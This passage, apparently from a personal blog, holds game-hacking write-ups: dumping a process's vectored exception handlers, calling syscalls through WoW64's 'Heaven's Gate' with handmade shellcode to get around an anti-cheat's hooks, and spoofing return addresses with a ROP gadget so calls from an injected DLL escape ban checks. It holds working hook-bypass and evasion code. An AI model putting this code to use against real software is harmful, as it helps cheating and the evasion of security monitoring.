  VECTORED_HANDLER_LIST handler_list;
  DWORD veh_addr = ntdll + GetVEHOffset();
  printf("VEH: 0x%08x\n", veh_addr);
  process->ReadProcMem(veh_addr, &handler_list, sizeof(handler_list));
  printf("First entry: 0x%p\n", handler_list.first_exception_handler);
  printf("Last entry: 0x%p\n", handler_list.last_exception_handler);

  if (reinterpret_cast<DWORD>(handler_list.first_exception_handler) ==
      veh_addr + sizeof(DWORD)) {
    printf("VEH list is empty\n");
    return 0;
  }

  printf("Dumping the entries:\n");
  VECTORED_HANDLER_ENTRY entry;
  process->ReadProcMem(
      reinterpret_cast<DWORD>(handler_list.first_exception_handler), &entry,
      sizeof(entry));
  while (true) {
    DWORD handler = reinterpret_cast<DWORD>(entry.handler);
    printf("  handler = 0x%p => 0x%p\n", handler,
           process->DecodePointer(handler));

    if (reinterpret_cast<DWORD>(entry.next) == veh_addr + sizeof(DWORD)) {
      break;
    }
    process->ReadProcMem(reinterpret_cast<DWORD>(entry.next), &entry,
                         sizeof(entry));
  }
}

POC

Game that uses VEH

With this, I can now walk through VEH and reverse what does the handlers do.
Again, this is not my original writeup, all credits goes to Dimitri Fourny.

Thank you for reading! I hope you’ve enjoyed 🙂

Through the Heaven’s Gate

Really, the title does not literary means it. This writeup is about a research but not mine. And you will see why this writeup is called “Through the Heaven’s Gate” later on.

Background

My interest in this topic started from reversing a game. This game hooks many userland functions including the ones I’m interested in, VirtualProtect and NtVirtualProtectMemory. Without this, I am unable to change protection on pages and such.

This pushes me to resolve my need via kernel driver. I map my own kernel and execute a ZwVirtualprotectmemory from there, sure, it worked. But I want to make everything stay in usermode as their Anti-cheat just stays too in ring3.

The path to solution

Luckily, I have some several contacts that helps me to resolve me problem.

Me: How can I use VirtualProtect or NtVirtualProtectMemory when it's hooked at all.
az: use syscall
Me: *after some quite time* I can't find decent articles about syscall.
az: You can syscall, and since league is wow64, you can do heaven's gate on it
Me: ???

After that conversation I was like, “WHAAAATT???”. So I then proceed to read some articles regarding this. I’m thankful to this person because he does not give the solution directly, but he did point me to the process on how I can formulate the solution. So let’s break it down!

Syscall

In computing, a system call (commonly abbreviated to syscall) is the programmatic way in which a computer program requests a service from the kernel of the operating system on which it is executed. This may include hardware-related services (for example, accessing a hard disk drive), creation and execution of new processes, and communication with integral kernel services such as process scheduling. System calls provide an essential interface between a process and the operating system.

For example, the x86 instruction set contains the instructions SYSCALL/SYSRET and SYSENTER/SYSEXIT (these two mechanisms were independently created by AMD and Intel, respectively, but in essence they do the same thing). These are “fast” control transfer instructions that are designed to quickly transfer control to the kernel for a system call without the overhead of an interrupt.[8] Linux 2.5 began using this on the x86, where available; formerly it used the INT instruction, where the system call number was placed in the EAX register before interrupt 0x80 was executed.[9][10]

https://en.wikipedia.org/wiki/System_call

But there were problem regarding this, syscall cannot be manually called from 32bit application running in a 64bit environment.

Wow64

In computing on Microsoft platforms, WoW64 (Windows 32-bit oWindows 64-bit) is a subsystem of the Windows operating system capable of running 32-bit applications on 64-bit Windows. It is included in all 64-bit versions of Windows—including Windows XP Professional x64 EditionIA-64 and x64 versions of Windows Server 2003, as well as 64-bit versions of Windows VistaWindows Server 2008Windows 7Windows 8Windows Server 2012Windows 8.1 and Windows 10. In Windows Server 2008 R2 Server Core, it is an optional component, but not in Nano Server[clarification needed]. WoW64 aims to take care of many of the differences between 32-bit Windows and 64-bit Windows, particularly involving structural changes to Windows itself.

https://en.wikipedia.org/wiki/WoW64

Let’s start reversing!

Okay, so first, I will be using Cheat Engine because it has a powerful tool that helps to enumerate dll’s. Second, I will be dissecting discord app as an example.

We’ll open up discord.
Enumerate the Dll’s
And look at that!

Look at that! Faker what was that?. We have seen two ntdll.dll, wow64.dll, wow64win.dll and wow64cpu.dll. Also, if you noticed, 3 dll’s are in 64bit address space. Remember that we cannot execute 64bit codes directly in 32bit application. So what’s happening?

Answer: WOW64

We’ll follow the traces from 32bit ntdll. Let’s trace the NtVirtualProtectMemory on it.

ZwProtectVirtualMemory in 32bit ntdll

It’s not a surprise that we might not found syscall here. But we’ll follow the call.

ntdll.RtlInterlockedCompareExchange64+170 in 32bit ntdll
wow64cpu.dll + 7000

Look at that! RAX?!! 64bit code! What is this?

In fact, on 64-bit Windows, the first piece of code to execute in *any* process, is always the 64-bit NTDLL, which takes care of initializing the process in user-mode (as a 64-bit process!). It’s only later that the Windows-on-Windows (WoW64) interface takes over, loads a 32-bit NTDLL, and execution begins in 32-bit mode through a far jump to a compatibility code segment. The 64-bit world is never entered again, except whenever the 32-bit code attempts to issue a system call. The 32-bit NTDLL that was loaded, instead of containing the expected SYSENTER instruction, actually contains a series of instructions to jump back into 64-bit mode, so that the system call can be issued with the SYSCALL instruction, and so that parameters can be sent using the x64 ABI, sign-extending as needed.

In Alex Lonescu’ blog, he said.

So, whenever you are trying to syscall a function on 32bit ntdll, it will then traverse from 32bit ntdll to 64bit ntdll via wow64 layer dll’s.

Finally! The syscall in 64bit ntdll!

To summarize,

32-bit ntdll.dll -> wow64cpu.dll’s Heaven’s Gate -> 64-bit ntdll.dll syscall-> kernel-land

The solution

We just need to copy the opcode from ZwProtectVirtualMemory in 32bit ntdll. As I said, it was already hooked so we cannot use it. Meanwhile, we can imitate the original opcodes of it before it was hooked.

template<typename T>
void makesyscall<T>::CreateShellSysCall(byte sysindex1, byte sysindex2, byte sysindex3, byte sysindex4, LPCSTR lpFuncName, DWORD offsetToFunc, byte retCode, byte ret1, byte ret2)
{
	if (!sysindex1 && !sysindex2 && !sysindex3 && !sysindex4)
		return;

#ifdef _WIN64
	byte ShellCode[]
	{
		0x4C, 0x8B, 0xD1,					//mov r10, rcx 
		0xB8, 0x00, 0x00, 0x00, 0x00,		        //mov eax, SysCallIndex
		0x0F, 0x05,					        //syscall
		0xC3								//ret				
	};

	m_pShellCode = (char*)VirtualAlloc(nullptr, sizeof(ShellCode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	if (!m_pShellCode)
		return;

	memcpy(m_pShellCode, ShellCode, sizeof(ShellCode));

	*(byte*)(m_pShellCode + 4) = sysindex1;
	*(byte*)(m_pShellCode + 5) = sysindex2;
	*(byte*)(m_pShellCode + 6) = sysindex3;
	*(byte*)(m_pShellCode + 7) = sysindex4;

#elif _WIN32
	byte ShellCode[]
	{
		0xB8, 0x00, 0x00, 0x00, 0x00,		        //mov eax, SysCallIndex
		0xBA, 0x00, 0x00, 0x00, 0x00,		        //mov edx, [function]
		0xFF, 0xD2,						//call edx
		0xC2, 0x14, 0x00								//ret
	};

	m_pShellCode = (char*)VirtualAlloc(nullptr, sizeof(ShellCode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	if (!m_pShellCode)
		return;

	memcpy(m_pShellCode, ShellCode, sizeof(ShellCode));

	*(uintptr_t*)(m_pShellCode + 6) = (uintptr_t)((DWORD)GetProcAddress(GetModuleHandleA("ntdll.dll"), lpFuncName) + offsetToFunc);

	*(byte*)(m_pShellCode + 1) = sysindex1;
	*(byte*)(m_pShellCode + 2) = sysindex2;
	*(byte*)(m_pShellCode + 3) = sysindex3;
	*(byte*)(m_pShellCode + 4) = sysindex4;

	*(byte*)(m_pShellCode + 12) = retCode;
	*(byte*)(m_pShellCode + 13) = ret1;
	*(byte*)(m_pShellCode + 14) = ret2;
#endif
}
makesyscall<NTSTATUS>(0x50, 0x00, 0x00, 0x00, "RtlInterlockedCompareExchange64", 0x170, 0xC2, 0x14, 0x00)(GetCurrentProcess(), &addr, &size, PAGE_EXECUTE_READ | PAGE_GUARD, &oldProtection)

POC

Okay, so here is it. We’ve injected the dll and got some print for debugging.

Printing base ntdll
Printing the location of Rtl…

We dumped the running executable to check the print results. And, hell yeah!

Result of dump
Check the location of Rtl…

We then therefore conclude that we have successfully bypassed basic usermode hook.

Extended usage

With all this knowledge, we can also implement heaven’s gate hook! All syscalls will then be caught, and have the option to do actions based on the syscalls as your will. But we will not cover this topics as it can be cited from another writeup: WOW64!Hooks: WOW64 Subsystem Internals and Hooking Techniques

Fig 14: https://www.fireeye.com/blog/threat-research/2020/11/wow64-subsystem-internals-and-hooking-techniques.html
NtResumeThread inline hook before transitioning through the WOW64 layer
Fig 15: https://www.fireeye.com/blog/threat-research/2020/11/wow64-subsystem-internals-and-hooking-techniques.html

Conclusion

We therefore conclude that wow64 application are able to execute 64bit syscalls via Heaven’s Gate.
A big thanks to admiralzero@UC for pointing me on the right direction. When I figured out that they hook usermode functions, I feel that was locked out and pushed to do kernel usage, but no, there was a way. And here it is, going through the heaven’s gate!

Basic ROP Chaining Attack on x86

There are lot of games that catches “cheaters” by checking the return address of a function call. After executing the function, it will return to the location of call. Anti-cheat checks the return address if it’s within the module range and whitelists ranges, else, if it’s not, you will get flagged and will result to ban.

Assembly Macros

Call

Saves procedure linking information on the stack and branches to the procedure (called procedure) specified with the destination (target) operand. The target operand specifies the address of the first instruction in the called procedure. This operand can be an immediate value, a general purpose register, or a memory location.

This instruction can be used to execute four different types of calls:

Near call
A call to a procedure within the current code segment (the segment currently pointed to by the CS register), sometimes referred to as an intrasegment call.

Far call
A call to a procedure located in a different segment than the current code segment, sometimes referred to as an intersegment call. Inter-privilege-level far call. A far call to a procedure in a segment at a different privilege level than that of the currently executing program or procedure.

Task switch
A call to a procedure located in a different task.

The latter two call types (inter-privilege-level call and task switch) can only be executed in protected mode. See the section titled “Calling Procedures Using Call and RET” in Chapter 6 of the IA-32 Intel Architecture Software Developer’s Manual, Volume 1, for additional information on near, far, and inter-privilege-level calls. See Chapter 6, Task Management, in the IA-32 Intel Architecture Software Developer’s Manual, Volume 3, for information on performing task switches with the CALL instruction.
https://c9x.me/x86/html/file_module_x86_id_26.html

push ReturnAddress — The address of the next instruction after the call
jmp SomeFunc — Change the EIP/RIP to the address of SomeFunc

Ret

Transfers program control to a return address located on the top of the stack. The address is usually placed on the stack by a CALL instruction, and the return is made to the instruction that follows the CALL instruction.

The optional source operand specifies the number of stack bytes to be released after the return address is popped; the default is none. This operand can be used to release parameters from the stack that were passed to the called procedure and are no longer needed. It must be used when the CALL instruction used to switch to a new procedure uses a call gate with a non-zero word count to access the new procedure. Here, the source operand for the RET instruction must specify the same number of bytes as is specified in the word count field of the call gate.

The RET instruction can be used to execute three different types of returns:

Near return
A return to a calling procedure within the current code segment (the segment currently pointed to by the CS register), sometimes referred to as an intrasegment return.

Far return
A return to a calling procedure located in a different segment than the current code segment, sometimes referred to as an intersegment return.

Inter-privilege-level far return
A far return to a different privilege level than that of the currently executing program or procedure.

The inter-privilege-level return type can only be executed in protected mode. See the section titled “Calling Procedures Using Call and RET” in Chapter 6 of the IA-32 Intel Architecture Software Developer’s Manual, Volume 1, for detailed information on near, far, and inter-privilege- level returns.

When executing a near return, the processor pops the return instruction pointer (offset) from the top of the stack into the EIP register and begins program execution at the new instruction pointer. The CS register is unchanged.

When executing a far return, the processor pops the return instruction pointer from the top of the stack into the EIP register, then pops the segment selector from the top of the stack into the CS register. The processor then begins program execution in the new code segment at the new instruction pointer.

The mechanics of an inter-privilege-level far return are similar to an intersegment return, except that the processor examines the privilege levels and access rights of the code and stack segments being returned to determine if the control transfer is allowed to be made. The DS, ES, FS, and GS segment registers are cleared by the RET instruction during an inter-privilege-level return if they refer to segments that are not allowed to be accessed at the new privilege level. Since a stack switch also occurs on an inter-privilege level return, the ESP and SS registers are loaded from the stack.

If parameters are passed to the called procedure during an inter-privilege level call, the optional source operand must be used with the RET instruction to release the parameters on the return.

Here, the parameters are released both from the called procedure’s stack and the calling procedure’s stack (that is, the stack being returned to).
https://c9x.me/x86/html/file_module_x86_id_280.html

add esp, 18h — Increase the stack pointer, decreasing the stack size, usually by the amount of arguments the function takes (that actually got pushed onto the stack and the callee is responsible for cleaning the stack). This is due to the stack “grows” downward.
pop eip — Practically pop the top of the stack into the instruction pointer, effectively “jmp” there.

Push

Decrements the stack pointer and then stores the source operand on the top of the stack. The address-size attribute of the stack segment determines the stack pointer size (16 bits or 32 bits), and the operand-size attribute of the current code segment determines the amount the stack pointer is decremented (2 bytes or 4 bytes). For example, if these address- and operand-size attributes are 32, the 32-bit ESP register (stack pointer) is decremented by 4 and, if they are 16, the 16-bit SP register is decremented by 2. (The B flag in the stack segment’s segment descriptor determines the stack’s address-size attribute, and the D flag in the current code segment’s segment descriptor, along with prefixes, determines the operand-size attribute and also the address-size attribute of the source operand.) Pushing a 16-bit operand when the stack addresssize attribute is 32 can result in a misaligned the stack pointer (that is, the stack pointer is not aligned on a doubleword boundary).

The PUSH ESP instruction pushes the value of the ESP register as it existed before the instruction was executed. Thus, if a PUSH instruction uses a memory operand in which the ESP register is used as a base register for computing the operand address, the effective address of the operand is computed before the ESP register is decremented.

In the real-address mode, if the ESP or SP register is 1 when the PUSH instruction is executed, the processor shuts down due to a lack of stack space. No exception is generated to indicate this condition.
https://c9x.me/x86/html/file_module_x86_id_269.html

sub esp, 4 — Subtracting 4 bytes in case of 32 bits from the stack pointer, effectively increasing the stack size.
mov [esp], eax — Moving the item being pushed to where the current stack pointer is located.

Pop

Loads the value from the top of the stack to the location specified with the destination operand and then increments the stack pointer. The destination operand can be a general-purpose register, memory location, or segment register.

The address-size attribute of the stack segment determines the stack pointer size (16 bits or 32 bits-the source address size), and the operand-size attribute of the current code segment determines the amount the stack pointer is incremented (2 bytes or 4 bytes). For example, if these address- and operand-size attributes are 32, the 32-bit ESP register (stack pointer) is incremented by 4 and, if they are 16, the 16-bit SP register is incremented by 2. (The B flag in the stack segment’s segment descriptor determines the stack’s address-size attribute, and the D flag in the current code segment’s segment descriptor, along with prefixes, determines the operandsize attribute and also the address-size attribute of the destination operand.) If the destination operand is one of the segment registers DS, ES, FS, GS, or SS, the value loaded into the register must be a valid segment selector. In protected mode, popping a segment selector into a segment register automatically causes the descriptor information associated with that segment selector to be loaded into the hidden (shadow) part of the segment register and causes the selector and the descriptor information to be validated (see the “Operation” section below).

A null value (0000-0003) may be popped into the DS, ES, FS, or GS register without causing a general protection fault. However, any subsequent attempt to reference a segment whose corresponding segment register is loaded with a null value causes a general protection exception (#GP). In this situation, no memory reference occurs and the saved value of the segment register is null.

The POP instruction cannot pop a value into the CS register. To load the CS register from the stack, use the RET instruction.

If the ESP register is used as a base register for addressing a destination operand in memory, the POP instruction computes the effective address of the operand after it increments the ESP register. For the case of a 16-bit stack where ESP wraps to 0h as a result of the POP instruction, the resulting location of the memory write is processor-family-specific.

The POP ESP instruction increments the stack pointer (ESP) before data at the old top of stack is written into the destination.

A POP SS instruction inhibits all interrupts, including the NMI interrupt, until after execution of the next instruction. This action allows sequential execution of POP SS and MOV ESP, EBP instructions without the danger of having an invalid stack during an interrupt1. However, use of the LSS instruction is the preferred method of loading the SS and ESP registers.
https://c9x.me/x86/html/file_module_x86_id_248.html

mov eax, [esp] — Move the value on top of the stack into whatever is being pop into.
add esp, 4 — To increase the esp, reducing the size of the stack.

Gadget/ROP Chaining

The idea
The technicality

Let’s get our hands dirty!

WARNING: ALL DETAILS BELOW ARE FOR EDUCATIONAL PURPOSES ONLY.

Now, our goal is to spoof the return address so we will not be having troubles with the return checks, thus, we will not get our account banned.

Normal call

As you can see in the example image, we have our application module that ranges from 0x500000 until 0x600000. The only valid return address should be in this range, otherwise the application will know that we are calling the function from different module.

Now to get things complicated, what if our function call is outside of the application module? Say, it was from an injected DLL?

Call outside of main module

As you can see above, we are calling the function somewhere from 0x700000 ~ 0x800000 which is not a valid range for return check, and would result our account to being banned.

Hands-on: Our target application (Game)

As we check the function we want to call, there is a return check inside of it.

Return check

The Solution

	static void Engine::CastSpellSelf(int SlotID) {
		if (me->IsAlive()) {
			DWORD spellbook = (DWORD)me + (DWORD)oObjSpellBook;
			auto spellslot = me->GetSpellSlotByID(SlotID);
			Vector* objPos = &me->GetPos();
			Vector* mePos = &me->GetPos();
			DWORD objNetworkID = 0;
			DWORD SpoofAddress = (DWORD)GetModuleHandle(NULL) + (DWORD)oRetAddr; //retn instruction
			DWORD CastSpellAddr = (DWORD)GetModuleHandle(NULL) + (DWORD)oCastSpell;//CastSpell


			if (((*(DWORD*)SpoofAddress) & 0xFF) != 0xC3)
				return; //This isn't the instruction we're looking for

			__asm
			{
				push retnHere //address of our function,  
					mov ecx, spellbook //If the function is a __thiscall don't forget to set ECX
					push objNetworkID
					push mePos
					push objPos
					push SlotID
					push spellslot
					push SpoofAddress
					jmp CastSpellAddr
				retnHere :
			}
		}
	}

As you can see above, from the line 18 to line 23, that is our original function parameters. In line 24, I also pushed the SpoofAddress, which is our gadget.

Our gadget

When the function has finished executing, it will pop to our gadget, then it will hit the return instruction back where we originally called the function (outside of the application). The return address will be our gadget, which is inside the application module, thus successfully bypassing the return check.

Additional Note (Another example)

The function above is a __thiscall function. As per microsoft documentation, the function will clean the passed parameters itself that’s why our gadget has only retn instruction. On other case, if it does not clean the passed parameters, then you might want to find a gadget inside the application module that does pop the passed parameters before the retn.

Target function

The above function will be our target and we want to spoof the return address when we call it. Since its __cdecl, we want to clean our own parameters after executing the function. Just find a gadget inside the module that has the ff instructions:

add esp, 28 
ret

We need to clean the esp stack by size of 28, which comes from the parameters. We have 7 parameters so the formula will be 7 x 4bytes = 28, then return.

Thankfully, there is a site where you can easily transform instructions to opcodes so you can easily search the module.

Instruction to opcode
IDA: Binary Search
A lot of results you can choose from

Testing if our spoof works

It’s easy to tell if your spoof works. Just run the application and see if you will get banned after a few days ???

BAN

Or just write a code that gets the value of variable where the flag is being stored.

If you are lucky enough in bypassing the check, then you are now safe from bans (or you just think so).

Sample

Conclusion

First of all, I want to say thank you to the people of UC for giving some quite good materials and resources. Second, I want to thank PITSF for inspiring a lot of people who’s interested in ethical hacking and security. Mabuhay po kayo. And last but not the least, I want to thank the readers who finished reading this post. I am sorry if there are grammatical/terminology errors, English is not my mother tongue.

ROP Chaining Attack is easy to execute but having additional layer of security is enough to catch intruders to the system. Some anti-cheat enumerate the modules, some implements whitelist of modules, some hook the system functions for them to have advantage on control of system, and etc.

Once again, thank you so much!